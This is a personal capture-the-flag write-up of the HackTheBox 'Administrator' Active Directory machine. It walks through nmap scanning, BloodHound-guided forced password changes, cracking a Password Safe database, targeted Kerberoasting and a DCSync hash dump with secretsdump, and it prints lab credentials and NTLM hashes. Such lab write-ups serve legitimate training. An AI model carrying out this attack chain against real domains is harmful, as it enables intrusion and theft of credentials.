Administrator - wook413

#hackthebox #medium #activedirectory ![[Pasted image 20250723003141.png]] # Information Gathering First, as always, I started off with scanning all TCP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- -oN tcpall Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:00 EDT Nmap scan report for 10.10.11.42 Host is up (0.045s latency). Not shown: 65503 closed tcp ports (reset), 6 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 57294/tcp open unknown 63557/tcp open unknown 63562/tcp open unknown 63565/tcp open unknown 63582/tcp open unknown 63614/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 14.46 seconds ``` Then I ran one more TCP scan against the open ports found with `-sCV` tags to get more information about the services. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sCV $IP -p 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,57294,63557,63562,63565,63582,63614 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:02 EDT Nmap scan report for 10.10.11.42 Host is up (0.048s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-23 09:02:15Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 57294/tcp open msrpc Microsoft Windows RPC 63557/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 63562/tcp open msrpc Microsoft Windows RPC 63565/tcp open msrpc Microsoft Windows RPC 63582/tcp open msrpc Microsoft Windows RPC 63614/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-07-23T09:03:12 |_ start_date: N/A |_clock-skew: 6h59m59s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 71.11 seconds ``` Lastly a UDP scan against top 10 ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:04 EDT Nmap scan report for 10.10.11.42 Host is up (0.047s latency). PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 123/udp open ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp closed snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds ``` --- # Enumeration By looking at the result of Nmap scans, you can be almost certain that this is a Domain Controller. Kerberos, LDAP, DNS are running. LDAP scans revealed the domain name and the `Service Info` line revealed the host is DC indeed. The box is based on an `Assumed Breach` scenario, so we are given a set of valid credentials: `Olivia:ichliebedich`. Let's first check if the credentials are actually valid and present in the system. ##### SMB - TCP 445 `nxc` confirms the user `oliva` does exist. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nxc smb $IP -u olivia -p ichliebedich SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich ``` `SYSVOL` and `NETLOGON` shares once again prove that it's a DC because those two are standard shares for any Domain Controller. ![[Pasted image 20250722211344.png]] enumerated users with `nxc` ![[Pasted image 20250722211509.png]] ##### FTP - TCP 21 Port 21 is running and I found `olivia` doesn't have access to it and it doesn't allow anonymous authentication. Let's come back to this later when we get more valid creds. ##### WinRM - TCP 5985 `nxc` confirmed Olivia has access to WinRM, I logged in via `evil-winrm` ![[Pasted image 20250722212501.png]] As expected, it appeared Olivia doesn't have much privileges in the domain. ![[Pasted image 20250722212728.png]] In `C:\inetpub` there was `ftproot` directory that stood out to me but unfortunately I was not able to access it with the current user privileges. ![[Pasted image 20250722213505.png]] ##### Bloodhound I think we saw enough with the current user privileges, let's fire up bloodhound to see if we could move laterally within the domain and ultimately escalate privileges to Domain Admins. Let's first run `bloodhound-python` to collect data. ![[Pasted image 20250722214024.png]] After uploading the zip file, the first thing I did was mark Olivia as `owned`. She has one outbound edge to the user `Michael`, over whom Olivia has `GenericAll` permissions. ![[Pasted image 20250722214246.png]] When someone has `GenericAll` permissions over a user, the easiest attack we could perform is `Force Change Password` attack. The best thing about Bloodhound is it guides you how to execute the attack. ![[Pasted image 20250722214817.png]] ![[Pasted image 20250722215643.png]] Successfully logged in as `michael` but I still wasn't able to access the ftproot directory. ![[Pasted image 20250722215719.png]] Back to Bloodhound, I marked `Micahel` as owned. Michael has an outbound node `Benjamin` and Michael can change Benjamin's password. So basically we are repeating the steps one more time but this time as `Michael` and our victim is now `Benjamin`. ![[Pasted image 20250722220221.png]] Since Benjamin is not a member of `Remote Management Users` group, we can see that `nxc` against `winrm` failed. However, he has access to `FTP`! That's something. ![[Pasted image 20250722221103.png]]![[Pasted image 20250722221154.png]] Successfully logged into FTP server as Benjamin. There was `Backup.psafe3` which I downloaded for investigation. ![[Pasted image 20250722221403.png]] It's a `Password Safe V3 database` file. Honestly, it's my first time seeing this file type haha. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ file Backup.psafe3 Backup.psafe3: Password Safe V3 database ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat Backup.psafe3 PWS3OI&:ҫY*5Ջ:WyGk1rRA MUoj{F=maSaMz9[+C^<|L@6M<eQQ 5_Q}_ ">Iuer ZGakk>YO]B"btwQ i<Bg^ƈELKAD/P\jD]^jԫ3+Q>hqB ȗiYqox!og%oucq-tބ-]zq5Զ (4j8JHtmh:^hNnI{+1Gw,rRh;cpSPM>5h>a2g@ģ]js{WkXí[;yqY!Zyk59Ft # \9h?s=~GLbH3&CdXj3pA]0|"hBkk(vG^~E!&'|&):A*<|$D|K U7xDNy 3Q< ``` It's an encrypted files from `Password Safe v3` and it may store password data? ![[Pasted image 20250722221844.png]] I turned it into hash first using `pwsafe2john` and tried to crack it but continued to fail. ![[Pasted image 20250722223757.png]] `hashcat` website guides us to use mode `5200` for Password Safe v3. ![[Pasted image 20250722224556.png]] I just passed the file itself to Hashcat using mode 5200, without converting it to a hash — and to my surprise, it was cracked! ![[Pasted image 20250722224752.png]] Now we know the password, we need to install `Password Safe`. I grabbed the latest release `passwordsafe-debian12-1.22-amd64.deb` from their Github repository [here](https://github.com/pwsafe/pwsafe/releases) ![[Pasted image 20250722225756.png]] Password Safe prompted me to enter the Master Password. I entered the password we cracked and it appeared to contain 3 passwords! `alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw` `emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb` `emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur` ![[Pasted image 20250722225918.png]] I'm currently interested in user `emily` because she's the only one out of the three that has access to `WinRM`. How do I know? I looked them up in Bloodhound and Emily is a member of `Remote Management Users` group. ![[Pasted image 20250722230538.png]] Just to be sure, I checked with `nxc` and it confirmed that I'm able to connect to WinRM as emily . ![[Pasted image 20250722230823.png]] Found `user.txt` ![[Pasted image 20250722231115.png]] # Privilege Escalation Bloodhound again reveals that Emily has an outbound node, `Ethan` over whom Emily has `GenericWrite` permissions. Bloodhound explains that `GenericWrite` grants you the ability to write to any non-protected attribute on the target object. Simply put, I, as user Emily, can set a SPN on Ethan which can be abused for Targeted Kerberoast attack. ![[Pasted image 20250722231745.png]] Bloodhound guides us that a targeted Kerberoast attack can be performed with `targetedKerberoast.py` which can be downloaded from [here](https://github.com/ShutdownRepo/targetedKerberoast) I spent so much time trying to get this `targetedKerberoast.py` exploit work. No matter how hard I tried I kept facing the following error: `KRB_AP_ERR_SKEW(Clock skew too great)`. I know how timestamp is important when it comes to Kerberos-based attacks. I tried to sync my time using `sudo ntpdate administrator.htb` but it didn't work. What worked for me is the troubleshoot from this [blog](https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069). Anyways I got the ticket ![[Pasted image 20250723000133.png]] Successfully cracked the hash. `limpbizkit` ![[Pasted image 20250723000839.png]] Ethan doesn't have access to `WinRM`. ![[Pasted image 20250723001222.png]] Collected data for Bloodhound again but this time as our newly found user `ethan` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ bloodhound-python -u ethan -p limpbizkit -d administrator.htb -ns $IP -c All --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: administrator.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 11 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.administrator.htb INFO: Done in 00M 08S INFO: Compressing output into 20250723121357_bloodhound.zip ``` It appears that user `ethan` can perform `DCSync` attack against the domain `administrator.htb` ![[Pasted image 20250723002614.png]] Now let's dump hashes for the domain `administrator.htb` with `secretsdump.py` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-secretsdump ethan:[email protected] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467::: administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850::: administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 <SNIP> ... ``` Finally logged in as `administrator` ![[Pasted image 20250723003021.png]] Found `root.txt` ![[Pasted image 20250723003100.png]]